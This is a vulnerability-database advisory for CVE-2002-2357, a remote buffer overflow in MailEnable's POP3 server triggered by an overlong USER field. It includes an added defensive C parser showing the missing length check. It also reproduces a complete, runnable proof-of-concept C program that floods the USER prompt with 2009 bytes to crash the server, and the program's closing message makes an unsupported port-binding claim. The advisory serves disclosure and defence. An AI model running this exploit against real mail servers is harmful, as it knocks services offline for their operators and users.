MailEnable Email Server Remote Buffer Overflow Vulnerability

Vulnerability ID: 1107102    Vulnerability type: Buffer overflow
Published: 2002-11-18    Updated: 2002-12-31
CVE ID: CVE-2002-2357
CNNVD ID: CNNVD-200212-207
Platform: Windows    CVSS score: 5.0
|Vulnerability Sources
https://www.exploit-db.com/exploits/22023
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-207
|Vulnerability Details
MailEnable is a web-based mail server. The MailEnable POP3 server does not properly check the data supplied in the user login field, so a remote attacker can use this flaw to trigger a buffer overflow and possibly execute arbitrary instructions on the system with the privileges of the POP3 process. An attacker connects to a vulnerable MailEnable POP3 service and enters an overly long string at the USER prompt, which triggers the overflow; carefully crafted data may allow arbitrary instructions to run with the privileges of the POP3 process.
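The following is an added example, not part of this advisory and not MailEnable's code: a bounded parser for the POP3 USER command in C, showing the length check the advisory says the vulnerable server lacked. The argument is copied only after it has been verified to fit both the destination buffer and an assumed server-side limit USER_MAX (64 bytes here; RFC 1939 section 3 allows each command argument up to 40 characters, so the limit is generous). The names parse_user_command, classify_user_line and classify_repeated_user, the USER_MAX value and the sample lines are this example's own assumptions and constructed inputs. A server built this way answers an oversized USER line with an error code instead of writing past its buffer, which is the relevant code-level mitigation alongside applying the vendor fix.

```c
/* Added example (not from the advisory or from MailEnable): a bounded POP3
 * USER-command parser. USER_MAX is an assumed server policy limit; RFC 1939
 * section 3 caps each command argument at 40 characters, so 64 leaves margin.
 * The caller is expected to have read the line into its own bounded buffer. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* strncasecmp */
#include <ctype.h>

#define USER_MAX 64    /* assumed server-side limit in bytes, excluding NUL */

enum pop3_parse {
    POP3_OK = 0,
    POP3_NOT_USER = -1,      /* line is not a USER command */
    POP3_ARG_MISSING = -2,   /* "USER" with no mailbox name */
    POP3_ARG_TOO_LONG = -3,  /* argument exceeds USER_MAX: the advisory's case */
    POP3_BAD_CHAR = -4       /* non-printable byte or space inside the argument */
};

/* Parse one received line (trailing CRLF optional) into `user`, which has
 * capacity `user_cap`. Returns POP3_OK and fills `user`, or a negative code;
 * `user` is untouched on failure, so a rejected command never writes to it. */
int parse_user_command(const char *line, char *user, size_t user_cap)
{
    size_t len = strlen(line);
    size_t arg_len, i;
    const char *arg;

    /* Trim the line terminator, if present. */
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;

    /* Keyword match is case-insensitive per RFC 1939. */
    if (len < 4 || strncasecmp(line, "USER", 4) != 0)
        return POP3_NOT_USER;
    if (len == 4 || line[4] != ' ')
        return len == 4 ? POP3_ARG_MISSING : POP3_NOT_USER;

    arg = line + 5;
    arg_len = len - 5;
    if (arg_len == 0)
        return POP3_ARG_MISSING;

    /* Length check BEFORE any copy: this is the check the vulnerable server
     * lacked. The caller's buffer size is honoured as well. */
    if (arg_len > USER_MAX || arg_len >= user_cap)
        return POP3_ARG_TOO_LONG;

    for (i = 0; i < arg_len; i++) {
        if (!isprint((unsigned char)arg[i]) || arg[i] == ' ')
            return POP3_BAD_CHAR;
    }

    memcpy(user, arg, arg_len);
    user[arg_len] = '\0';
    return POP3_OK;
}

/* Convenience wrapper: parse into a local buffer and return only the code. */
int classify_user_line(const char *line)
{
    char user[USER_MAX + 1];
    return parse_user_command(line, user, sizeof user);
}

/* Build "USER " followed by n_a 'A' bytes (the shape of the input the
 * advisory describes, constructed here) and classify it. */
int classify_repeated_user(size_t n_a)
{
    char *line = malloc(n_a + 6);
    int rc;
    if (!line)
        abort();
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', n_a);
    line[5 + n_a] = '\0';
    rc = classify_user_line(line);
    free(line);
    return rc;
}

int main(void)
{
    /* Constructed sample lines, not captured traffic. */
    const char *samples[] = { "USER alice\r\n", "user bob", "USER", "PASS x", "USER bad name" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu -> %d\n", i, classify_user_line(samples[i]));
    printf("USER + 2009 x 'A' -> %d\n", classify_repeated_user(2009));
    return 0;
}
```

The parser rejects with POP3_ARG_TOO_LONG before touching the destination, so the 2009-byte argument the advisory describes produces an error reply rather than memory corruption; the separate user_cap check means the limit also holds if a caller passes a smaller buffer than USER_MAX.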
|Vulnerability EXP
source: http://www.securityfocus.com/bid/6197/info

A buffer overflow vulnerability has been reported for MailEnable's POP3 server. The vulnerability is due to insufficient bounds checking of the USER login field.

An attacker can exploit this vulnerability by connecting to a vulnerable MailEnable server and sending an overly long string as the value for the USER login prompt. This will trigger the buffer overflow condition.

/*
 *
 * Written by redsand
 * <[email protected]>
 * Vuln. date found: November 18, 2002
 * Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
 *
 * Usage: ./mailenable-dos.1.3 <host> [port]   [port] is optional; default is in the #define (port 110)
 * Need to Enable [offset] in final release.
 *
 * Proof of Concept code (PoC)
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>      /* bzero, bcopy */
#include <unistd.h>       /* close */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 110

char string[2010];                 /* 2009 'A' bytes plus terminating NUL */
char death[2500];                  /* "USER " + string + tag */
char top[6], end[50];              /* top must hold "USER " plus its NUL (6 bytes) */
char tag[] = "::redsand.net::";

int main(int argc, char *argv[]) {

  int sockfd, port, i;
  char buf[2500];                  /* only used by the commented-out read() below */
  struct hostent *ha;
  struct sockaddr_in sa;

  if (argc < 2) {
    printf("MailEnable POP Server Version 1.02 DoS\n:: redsand <at> redsand.net\r\nUsage: %s <host> <port>\n", argv[0]);
    exit(0);
  }
  if (argv[2]) {
    port = atoi(argv[2]);
  } else {
    port = PORT;
  }

  /* Fill the oversized USER argument. */
  for (i = 0; i < 2009; i++) {
    string[i] = 'A';
  }

  strcpy(top, "USER ");
  strcpy(end, tag);
  strcpy(death, top);
  strcat(death, string);
  strcat(death, end);

  if (!(ha = gethostbyname(argv[1]))) {
    perror("gethostbyname");
    exit(1);
  }

  bzero(&sa, sizeof(sa));
  bcopy(ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons(port);

  if ((sockfd = socket(ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror("socket");
    exit(1);
  }
  printf("MailEnable :: redsand <at> redsand.net\r\n+ connecting...\n");
  if (connect(sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror("connect");
    exit(1);
  }
  printf("+ connected\n+ sending request to pop3 server\n");
  /* Sends the whole 2500-byte buffer, trailing NUL padding included. */
  send(sockfd, death, sizeof(death), 0);
  // read(sockfd, buf, 2050, 0);
  close(sockfd);
  printf("+ finished\n");
  printf("\r\rIf exploit worked, then it should bind port on 3879\n");
  return 0;
}

/* redsand.net */
|References

Source: BID
Name: 6197
Link: http://www.securityfocus.com/bid/6197
Source: XF
Name: mailenable-pop3-server-dos(10652)
Link: http://www.iss.net/security_center/static/10652.php
Source: BUGTRAQ
Name: 20021117 MailEnable POP3 Server remote shutdown !:/ - newest ~(and previous) buffer overflow -
Link: http://archives.neohapsis.com/archives/bugtraq/2002-11/0236.html
Source: NSFOCUS
Name: 3860
Link: http://www.nsfocus.net/vulndb/3860
